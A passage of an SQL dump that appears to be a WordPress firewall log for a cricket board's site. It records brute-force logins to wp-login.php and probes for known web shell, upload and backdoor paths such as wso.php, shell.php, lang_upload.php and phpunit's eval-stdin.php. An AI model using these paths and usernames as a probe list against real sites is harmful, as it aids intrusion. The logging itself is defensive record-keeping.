3T4spCHu81OP','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php'),('195.201.236.200',3284790472,'',0,1674875467.8486,55,'PpOmHM4QYXU6RJLgFhSCTBxj','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/themes/spikes/include/lang_upload.php'),('195.201.236.200',3284790472,'',0,1674875474.0352,55,'KuRYHOByv8D2qCdgAPQcfhxU','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/themes/churchlife/include/lang_upload.php'),('195.201.236.200',3284790472,'',0,1674875480.1455,55,'1Ogt9TiPueAhb8maqlIBsJWk','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/themes/club-theme/include/lang_upload.php'),('195.201.236.200',3284790472,'',0,1674875491.8109,55,'ip5lnsIgJCwyMXq3zWxZ9H0u','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/themes/footysquare/include/lang_upload.php'),('8.210.174.93',148024925,'wadminw',0,1674887168.4914,51,'VAoE8OyxB4csN290d1UwbLXJ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('47.114.72.18',796018706,'admin',0,1674887232.9036,7,'ZiGY720LstQIkHC9y1hx8jmu','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('40.77.111.208',676163536,'wwwadmin',0,1674887901.2163,51,'XtHILCkVlraegQTNEiFb2JxS','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('47.110.72.238',795756782,'admin',0,1674906486.5389,7,'UDP0CAEo4Mg19TcQxeGn85X6','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('198.98.60.32',3328326688,'admin',0,1674916925.9060,7,'VDJ9k3vmq5cLzxUitKfGuS7C','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.48.210',3515691218,'admin',0,1674921865.0589,7,'wTjhnvcW907sdf5ya4gREZJx','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('111.230.202.147',1877396115,'admin',0,1674925628.3634,7,'MydaPWwnINK4UohbRYqS3eF9','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('74.208.190.148',1255194260,'',0,1674930675.3144,55,'OKFvo9mGVxQJzLY5CXcTi3eH','','19|0|0|0|yorkshirecricketboard.org.uk/wsoyanzorng.php'),('74.208.190.148',1255194260,'',0,1674930686.0799,55,'lTq94xwcLOCNu1ir2HKPnJem','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wsoyanzorng.php'),('74.208.190.148',1255194260,'',0,1674930696.0194,55,'cM2mDsTJqFVnYh5lpebizvWw','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/wsoyanzorng.php'),('74.208.190.148',1255194260,'',0,1674930700.6208,55,'t8aPwNogJKq7kOrL1izenMb6','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin/wsoyanzorng.php'),('209.141.44.126',3515690110,'admin',0,1674931917.9878,7,'oLbZFa0IVYDTP498eisxckqu','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('128.199.131.42',2160558890,'admin',0,1674932596.2878,7,'hW1uXCIdnOx7Ms9BaYjfltDr','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('185.135.82.191',3112653503,'admin',0,1674938730.5854,7,'y7CBEY9ZDkKT0aAbwvhpqsfi','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('158.69.23.79',2655328079,'',0,1674943205.9644,55,'MfwpPiBneZzuTkdAFbUt3oHY','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/languages/plugins/plugins.php'),('185.2.4.56',3103917112,'admin',0,1674944507.9482,7,'EpJ0qSw8YBcrFe5z61TdHfM9','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('143.110.152.206',2406389966,'admin',0,1674950229.5322,7,'ga2HLGCB0e3KVWRwUDXScn56','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('45.61.184.58',759019578,'admin',0,1674950692.5487,7,'b2A6ezTnURd1sPFBZ79twvCN','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('54.37.156.240',908434672,'admin',0,1674956783.2474,7,'GZp9rjCUvAw4yQbgtKYufWdh','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('68.183.86.247',1152866039,'admin',0,1674960161.8489,7,'hd4XUTQvNR6gaYzs8CfqpxO1','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('167.235.199.14',2817246990,'',0,1674963464.6966,55,'kdKDmzufxywRtsbrq19SMa3W','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/statfort-new/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963492.6195,55,'5CYjyvqZMX8nl3fAzBFUJEDk','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/faith-theme/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963502.0815,55,'5sqx10Ku2c4jztn6EGbDZFYT','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/snapture/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963533.9953,55,'HOsm6RFAwgv2N0UtdrTBlJPM','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/kingclub-theme/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963577.6540,55,'Gq4vlAcn1FMBDVtdLCgeiXJp','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/club-theme/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963577.7280,10,'Gq4vlAcn1FMBDVtdLCgeiXJp','','707|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/club-theme/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963597.3244,55,'R5NYvnf6izU1HFDLWubpAyVX','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/onelife/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963607.2812,55,'XRDuta3Y9QkHEP2jBpV45zNh','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/spikes-black/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963612.0700,55,'Tt5HnqUSrd73mfFCeWsLlwxZ','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/rocky-theme/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963621.2870,55,'pa70j6OysEn2BvTtDoiH18KZ','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/bolster-theme/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963626.3847,55,'nxHDIPTVZrq37mWjdcb5oRFY','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/churchlife/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963638.7994,55,'gM8aGVJXoKPkYC1jdi60v3OI','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/soccer-theme/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963648.3296,55,'vTCcgfbdmzNQGrMtPHe2L6li','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/aidreform/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963662.5684,55,'3JthwcysSkEBCzaxR92TVlnL','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/soundblast/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963666.9207,55,'sBp0VTg6WFZhUuR4d87DCrem','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/theme-deejay/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963689.8138,55,'8gRnG5hTW2qoQKbf4Oz3EN9P','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/westand/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963703.6500,55,'K69Fo3f5nGeXrJHOmQwWBRpy','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php'),('167.235.199.14',2817246990,'',0,1674963708.4116,55,'JEbnFGhSUHXT15LpClNA6Rqy','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/footysquare/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963740.7844,55,'pLkFhJWVfKoaPc0ylxMUCB9d','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/statfort/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963750.5336,55,'OzwJNKbYG4Rilv21QL5hmpMC','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/spikes/include/lang_upload.php'),('167.235.199.14',2817246990,'',0,1674963755.1201,55,'6TH8p5Xon3dWASQfgO0REZel','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/bolster/include/lang_upload.php'),('185.2.4.33',3103917089,'admin',0,1674967681.4443,7,'tWzwOHSasKEXFydq9NBn5ibk','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('107.189.6.203',1807550155,'admin',0,1674968053.0626,7,'dK0boAZ3VfkmsX6DOxhziU5j','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.47.94',3515690846,'admin',0,1674970470.0275,7,'7WmgKE65idxXuSlOt8Aqvryc','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('64.227.6.141',1088620173,'admin',0,1674971259.7982,7,'IHhgUcQzmr40qZyiVAM716bj','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('148.72.214.194',2487801538,'admin',0,1674974774.9034,7,'wor8qZHY3kxfDQC2bezEPS6n','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('107.189.3.40',1807549224,'admin',0,1674979463.2636,7,'MVhqKENWYjFvIHreCkR5O8zg','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.26',96222746,'yorkshirecricketboard',0,1674980669.4542,51,'Ox89yLmuBKY0r2bHv4NTCWwt','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('51.91.151.60',861640508,'admin',0,1674982529.5339,7,'dlLKJRkcmG2b8Fu057tV6xyp','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('20.14.130.192',336495296,'',0,1674984671.8151,55,'RCS1MtiwlETIWxjKPeGAnYup','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/css/modules.php'),('20.14.130.192',336495296,'',0,1674984672.8737,55,'srBXpI0qumMDxHgifc8Vbka2','','19|0|0|0|yorkshirecricketboard.org.uk/wso.php'),('20.14.130.192',336495296,'',0,1674984673.7401,55,'2BnEjy9uGdFVfKbC8Upt30QD','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/upspy/index.php'),('20.14.130.192',336495296,'',0,1674984674.8780,55,'niexAUOTGB28wjMHLguRaKtD','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ubh/index.php'),('20.14.130.192',336495296,'',0,1674984675.9582,55,'KPGsHVFxqeE9cj63nwL5ZbB2','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.14.130.192',336495296,'',0,1674984676.0246,10,'KPGsHVFxqeE9cj63nwL5ZbB2','','707|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.14.130.192',336495296,'',0,1674984677.3477,100,'k8JWgYN6saFPxnvi7pmRGDyl','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/xichang/x.php'),('20.14.130.192',336495296,'',0,1674984679.0335,55,'uJQLmS6n1bCxz4dp8W7e2ksD','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin/shapes.php'),('20.14.130.192',336495296,'',0,1674984680.1655,55,'HrJn8bDFm9ONuYMklRQPA2Bd','','19|0|0|0|yorkshirecricketboard.org.uk/olux.php'),('20.14.130.192',336495296,'',0,1674984680.9138,55,'lKatpAf0uOm7Qi58v4JnDTRc','','19|0|0|0|yorkshirecricketboard.org.uk/indoxploit.php'),('20.14.130.192',336495296,'',0,1674984682.9585,55,'eWQROtT4NDEgVByMYUKpzaqr','','19|0|0|0|yorkshirecricketboard.org.uk/up.php'),('20.14.130.192',336495296,'',0,1674984684.5470,55,'IYFVLwB9e7OKy5NCdnQRDAMW','','19|0|0|0|yorkshirecricketboard.org.uk/upload.php'),('20.14.130.192',336495296,'',0,1674984688.5323,55,'c39VQ0pwXNTnZAJgqaPGkW16','','19|0|0|0|yorkshirecricketboard.org.uk/shell.php'),('20.14.130.192',336495296,'',0,1674984689.8715,55,'f5K3SeAckhylRt2uFwsgUr7C','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin/network/wp-footer.php'),('20.14.130.192',336495296,'',0,1674984690.5640,55,'OrIY3Lb2MfmJ95ZVnvGqH4Po','','19|0|0|0|yorkshirecricketboard.org.uk/wp-info.php'),('20.14.130.192',336495296,'',0,1674984691.8545,55,'BGIF0cys9NCtOvaeVAK2xwLd','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/vuln.php'),('20.14.130.192',336495296,'',0,1674984693.4634,55,'avJhAdCQDVStlRyrO2xko8G0','','19|0|0|0|yorkshirecricketboard.org.uk/upel.php'),('20.14.130.192',336495296,'',0,1674984694.1951,55,'0whXWHPBf5oq71JmbcGt9CrY','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ppus/up.php'),('20.14.130.192',336495296,'',0,1674984695.1766,55,'VNtbuMsPa3jxT7mfZXIipLYq','','19|0|0|0|yorkshirecricketboard.org.uk/098.php'),('20.14.130.192',336495296,'',0,1674984695.9977,55,'3lA64PfvICzBOtTwSepu0Ncm','','19|0|0|0|yorkshirecricketboard.org.uk/V5.php'),('20.14.130.192',336495296,'',0,1674984696.8352,55,'n1qXhaedg3pilVbOsDmwMQR6','','19|0|0|0|yorkshirecricketboard.org.uk/new_license.php'),('20.14.130.192',336495296,'',0,1674984697.9999,55,'YnlLcBU3uzAEPkwZGX0S9FNM','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/theme-configurator/mini.php'),('20.14.130.192',336495296,'',0,1674984698.9469,55,'vGc0VlfFBLASQTzjsEk8qOa9','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/widget-logic/mini.php'),('212.192.24.22',3569358870,'admin',0,1674986334.8742,7,'nxKV7WkzqO9YprSXoyCesQIT','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.76',96222796,'yorkshirecricketboard',0,1674998746.4532,51,'tN8xkGleAbWU9oZ6MYBJ1Sha','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('75.119.135.205',1266124749,'admin',0,1674998855.9653,7,'63X4WQ0oDKpNVkR8LhHjSevY','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('107.189.6.184',1807550136,'admin',0,1675001462.1798,7,'VtAJzYdvFR8Oc5jXy7mHLUCk','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.45.47',3515690287,'admin',0,1675004012.9499,7,'eDkNb6crwZLvqn8dyPx4BzGs','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.48.210',3515691218,'admin',0,1675006827.6019,7,'z0YJoRdFjeXTlnikPcC4Gp8S','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('74.208.190.148',1255194260,'',0,1675008253.6294,55,'wTinf8V3XSsF0CJK5dDjBlc9','','19|0|0|0|yorkshirecricketboard.org.uk/wsoyanzorng.php'),('74.208.190.148',1255194260,'',0,1675008263.5549,55,'dtkHTx2S6UhWncCjKs80wNXA','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wsoyanzorng.php'),('74.208.190.148',1255194260,'',0,1675008278.0433,55,'N1hV4ywRd6eD8SKJ3tbXr2iQ','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ccx/index.php'),('74.208.190.148',1255194260,'',0,1675008290.0966,55,'91OL3IVQwFfCSMbWuBXdq5gx','','19|0|0|0|yorkshirecricketboard.org.uk/ccx/index.php'),('164.92.120.240',2757523696,'',0,1675016844.0899,70,'ox9qINn3Z57trbdvPhWXFV8D','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users/'),('209.141.57.9',3515693321,'admin',0,1675020072.3655,7,'q1KreJl0TahMt9ocDpF5NbA2','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('205.185.115.179',3451483059,'admin',0,1675025814.9480,7,'piTgIcu5aND4zfh2P96QbwnA','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('195.201.236.200',3284790472,'',0,1675027615.4079,55,'rI79XDb4HBe0vlKOhG2QzSPj','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('195.201.236.200',3284790472,'',0,1675027618.0578,55,'TFWmobelSMDLVv0rCNzH1BKJ','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('107.189.6.184',1807550136,'admin',0,1675029285.2771,7,'BswTMjUHhRfX9GnEFA5b78mt','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('198.98.49.240',3328324080,'admin',0,1675029690.6145,7,'kvMyLmwGFiCW70faq4bEs6eK','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('167.235.199.14',2817246990,'',0,1675029917.0144,55,'CUBE8wWdkmaehFGxH0MvusgI','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('167.235.199.14',2817246990,'',0,1675029920.2554,55,'HvQ6Mb0A4WrfjgY8RcEmzClx','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('5.188.62.140',96222860,'yorkshirecricketboard',0,1675035622.2189,51,'Dbm0Kf7EeaCVRpUvxkXqSnYT','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('195.201.236.200',3284790472,'',0,1675037894.5457,55,'hrZRDaXP1E5TMY36bAc4Cxfq','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php'),('195.201.236.200',3284790472,'',0,1675037910.4488,55,'fM1eXcWN7rDtvGqo6YAlF98P','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php'),('195.201.236.200',3284790472,'',0,1675037944.0214,55,'nPeUxqbrK5HYyBTAIfOwgQCs','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-includes/shell20211028.php'),('195.201.236.200',3284790472,'',0,1675037955.1739,55,'J5zPg6HFYdfRBUva1sxQylAT','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-includes/shell20211028.php'),('198.98.60.32',3328326688,'admin',0,1675038882.2415,7,'bteEmIVZyCz7RhYgM0GxUsLT','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('198.98.49.240',3328324080,'admin',0,1675042457.7763,7,'h5B30up4sDYPIlReTyqxQj7t','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('167.235.199.14',2817246990,'',0,1675045304.7076,55,'LdYnPjt2KU87JDc5WvZSI9iN','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php'),('167.235.199.14',2817246990,'',0,1675045307.3795,55,'NaRGqJ5Ksh7lgjz2bdFmHnIi','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php'),('167.235.199.14',2817246990,'',0,1675045313.4226,55,'c8XODiNejl2qf9oUPKs06LAZ','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/shell20211028.php'),('167.235.199.14',2817246990,'',0,1675045315.1717,55,'MDIoFup3wlTdHcXWAf09Q2Sv','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/shell20211028.php'),('167.235.199.14',2817246990,'',0,1675045319.0168,55,'I5NwJsgcKu8ikAyfVGrHmeFx','','19|0|0|0|yorkshirecricketboard.org.uk/1index.php'),('167.235.199.14',2817246990,'',0,1675045319.1574,10,'I5NwJsgcKu8ikAyfVGrHmeFx','','707|0|0|0|yorkshirecricketboard.org.uk/1index.php'),('167.235.199.14',2817246990,'',0,1675045320.5609,55,'0BLPcHovSUzhQpAt1GgiRkYs','','19|0|0|0|yorkshirecricketboard.org.uk/1index.php'),('107.189.14.89',1807552089,'admin',0,1675046548.4812,7,'cDXTqM8Yaxe04GrF52HpUVdo','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('195.201.236.200',3284790472,'yorkshirecricketboard',0,1675052523.0235,51,'dPugJsIfEwcHL9pZCmU0A5My','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('195.201.236.200',3284790472,'yorkshirecricketboard',0,1675052566.4684,51,'vExrhwQno4Gcb9FC76VZJBed','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('5.75.202.35',88853027,'yorkshirecricketboard',0,1675053702.5283,51,'X0iJtRLzaBu5nyoTf4Ie86KQ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('116.203.184.24',1959507992,'yorkshirecricketboard',0,1675054805.2118,51,'xSAqN5RtCh2cuPgs1E6BTl3K','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('159.69.189.243',2672147955,'yorkshirecricketboard',0,1675055862.8415,51,'A0Wuq5sKZVhinzPmfENyYwjJ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('159.69.189.243',2672147955,'yorkshirecricketboard',0,1675055899.5459,51,'w4aOp6zK2eH3fMNXjAsECvhI','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('188.34.187.187',3156392891,'yorkshirecricketboard',0,1675056950.2098,51,'ktTzvwQFsRp2WCqbnJBh15K6','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('188.34.187.187',3156392891,'yorkshirecricketboard',0,1675056987.0534,51,'1Y8KEkwlcozIhmrsWP0bXLty','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('195.201.236.200',3284790472,'yorkshirecricketboard',0,1675058047.7069,51,'V5piPtFkhXE2weQn1lZrsdMz','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('195.201.236.200',3284790472,'yorkshirecricketboard',0,1675058088.1593,51,'TWGzmat4EbiJnpBs7rjIPw9Y','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('159.69.189.243',2672147955,'yorkshirecricketboard',0,1675059125.0505,51,'8kW32jBE7Y5JMRGXPC9rLu0d','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('159.69.189.243',2672147955,'yorkshirecricketboard',0,1675059160.9827,51,'3G2L1iKNoSX9hZb6lVm4dCjF','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('116.203.184.24',1959507992,'yorkshirecricketboard',0,1675060253.9676,51,'ykjnPNa17gmU3tpcO9owSVfG','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('116.203.184.24',1959507992,'yorkshirecricketboard',0,1675060300.0615,51,'41TXtrgCunBxUJefFaVqR9d0','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('95.217.19.166',1608061862,'yorkshirecricketboard',0,1675061314.3906,51,'09bx82Trg1IoOYJRBLvF5Nsk','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('45.61.184.58',759019578,'admin',0,1675061330.3282,7,'usRe5FTcXZ6bJQWgNxk7A8UY','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('95.217.19.166',1608061862,'yorkshirecricketboard',0,1675061353.4813,51,'C73mUc0e5zOA1KLpZ9FnMDxH','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('205.185.124.254',3451485438,'admin',0,1675064624.9135,7,'OnYsRjcek27LrVH8otJuf0F6','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('107.189.1.148',1807548820,'admin',0,1675073831.9164,7,'HiTBR8ELY2Csmnx9gyk5UzhQ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.47.94',3515690846,'admin',0,1675073934.2486,7,'93slr1NMg4CZWnaTzBFGAVQL','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('85.215.104.244',1440180468,'',0,1675086516.0382,55,'bL1xvUjIDuFenf5rAVZ6Gs4w','','19|0|0|0|yorkshirecricketboard.org.uk/wsoyanzorng.php'),('85.215.104.244',1440180468,'',0,1675086525.8208,55,'UMLrwqoRkD8eNyf0sVWYO1Ib','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wsoyanzorng.php'),('85.215.104.244',1440180468,'',0,1675086566.4693,55,'XYUROhl6ZQALJ3wMKuVBH8mv','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ccx/index.php'),('85.215.104.244',1440180468,'',0,1675086587.9444,55,'7UPQg6wmqRa4zT5iyNkYnKHW','','19|0|0|0|yorkshirecricketboard.org.uk/ccx/index.php'),('208.97.181.78',3496064334,'',0,1675090285.4305,55,'ybVap6OGSut1kfQZjDTmcW4l','','19|0|0|0|yorkshirecricketboard.org.uk/wp-reset.php'),('208.97.181.78',3496064334,'',0,1675090286.2462,55,'rjBF9dE3bCZ0fwu4J2XRAIGy','','19|0|0|0|yorkshirecricketboard.org.uk/wp-setups.php'),('208.97.181.78',3496064334,'',0,1675090287.0965,55,'Ni6jS8eUTKlvxJpGoZt3P2Md','','19|0|0|0|yorkshirecricketboard.org.uk/about.php'),('208.97.181.78',3496064334,'',0,1675090287.4799,55,'g6Kde3DzEmP7NkjFLYXI4hUZ','','19|0|0|0|yorkshirecricketboard.org.uk/about.php'),('208.97.181.78',3496064334,'',0,1675090287.8093,55,'RO6mZEe8sXU5LdrGgnpuK124','','19|0|0|0|yorkshirecricketboard.org.uk/admin.php'),('208.97.181.78',3496064334,'',0,1675090287.8532,10,'RO6mZEe8sXU5LdrGgnpuK124','','707|0|0|0|yorkshirecricketboard.org.uk/admin.php'),('208.97.181.78',3496064334,'',0,1675090288.2140,18,'iCPoScdVvbwM4NGWFpEeLqr6','','13|0|0|0|yorkshirecricketboard.org.uk/admin.php'),('208.97.181.78',3496064334,'',0,1675090288.5768,100,'TrkcsnLlMzJjCXouWy5B4Ywg','','13|0|0|0|yorkshirecricketboard.org.uk/wp-story.php'),('208.97.181.78',3496064334,'',0,1675090288.9076,18,'Ql6bVwA2Y9LurgB7DJpzns0H','','13|0|0|0|yorkshirecricketboard.org.uk/wp-story.php'),('208.97.181.78',3496064334,'',0,1675090289.2478,55,'pIyYTLJBnHijk8P4lbeCoQWa','','19|0|0|0|yorkshirecricketboard.org.uk/simple.php'),('208.97.181.78',3496064334,'',0,1675090290.0227,55,'WLyQp84isrqgDIw5uKdBc2YG','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/core-stab/index.php'),('208.97.181.78',3496064334,'',0,1675090290.3632,55,'1NG3KoMv5er0pXiCaWymZV7H','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/classic/inc/index.php'),('104.244.77.229',1760841189,'admin',0,1675091021.5189,7,'cU5HDokG3qY0MQ7sSmvPZwua','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('52.176.65.17',883966225,'admin',0,1675091756.3994,7,'yaYAWZd6n42TVFeiKpQjJDwr','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('207.180.236.22',3484740630,'wwwadmin',0,1675092675.1177,51,'rJmPsdX8bUokiA9zFW1VBG6M','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('199.195.254.123',3351510651,'admin',0,1675094621.5211,7,'vZLpCwQTcbfDmXjBRoM0tE9O','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('157.245.55.196',2650093508,'admin',0,1675095839.7405,7,'rpm5NaPfcWE7IA9OdgixSze0','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('20.245.185.110',351648110,'',0,1675100993.0372,55,'euNTfX1EInMk0pVUdmZPaoc2','','19|0|0|0|yorkshirecricketboard.org.uk//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('164.92.120.240',2757523696,'admin',0,1675102574.6824,7,'mtoD8lcu4UPkGEBTirgFKXbv','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('198.98.50.216',3328324312,'admin',0,1675107453.5223,7,'EVUh64RkXy0MdKcTxtvnN37Z','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('188.212.34.69',3168019013,'admin',0,1675108291.0820,7,'BqP7Q4Zr2jSs95IR8ehubcgx','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('209.141.57.60',3515693372,'admin',0,1675108738.2696,7,'ZxjtSEIrdfJeR8UlLNXgoMub','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('54.37.156.240',908434672,'admin',0,1675110878.9588,7,'GHpISOUM1ZWVJLg97m6yYsia','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('175.178.125.173',2947710381,'admin',0,1675118683.8061,7,'6ScJPOxTdfmW1YnAyNCDQwIo','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('157.245.207.53',2650132277,'admin',0,1675121055.8870,7,'I5rB9iqeSHEMKsc1UWAOnZFj','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('47.105.73.13',795429133,'admin',0,1675128067.7300,7,'bR2lmHY4VFDQtw6deUxg8Pro','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-login.php'),('144.126.223.177',2424233905,'admin',0,1675130425.3227,7,'fN5kR2ALGwOo3He80Mx